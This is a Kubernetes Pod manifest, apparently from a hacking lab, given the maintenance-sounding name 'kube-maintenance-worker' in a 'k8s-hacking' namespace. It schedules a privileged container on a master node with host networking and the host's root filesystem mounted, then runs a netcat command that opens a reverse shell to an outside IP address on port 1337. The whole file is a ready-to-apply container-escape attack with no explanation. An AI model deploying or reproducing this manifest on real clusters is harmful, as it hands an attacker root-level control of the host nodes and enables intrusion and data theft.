
apiVersion: v1
kind: Pod
metadata:
  name: kube-maintenance-worker
  namespace: k8s-hacking
spec:
  nodeName: k8s-masster-2
  tolerations:
  - operator: "Exists"
  hostNetwork: true
  containers:
  - name: escape
    image: alpine
    command: ["/bin/sh", "-c", "nc 172.24.82.240 1337 -e /bin/sh"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-fs
      mountPath: /host-escape    
  volumes:
  - name: host-fs
    hostPath:
      path: /
      type: Directory  
  restartPolicy: Never
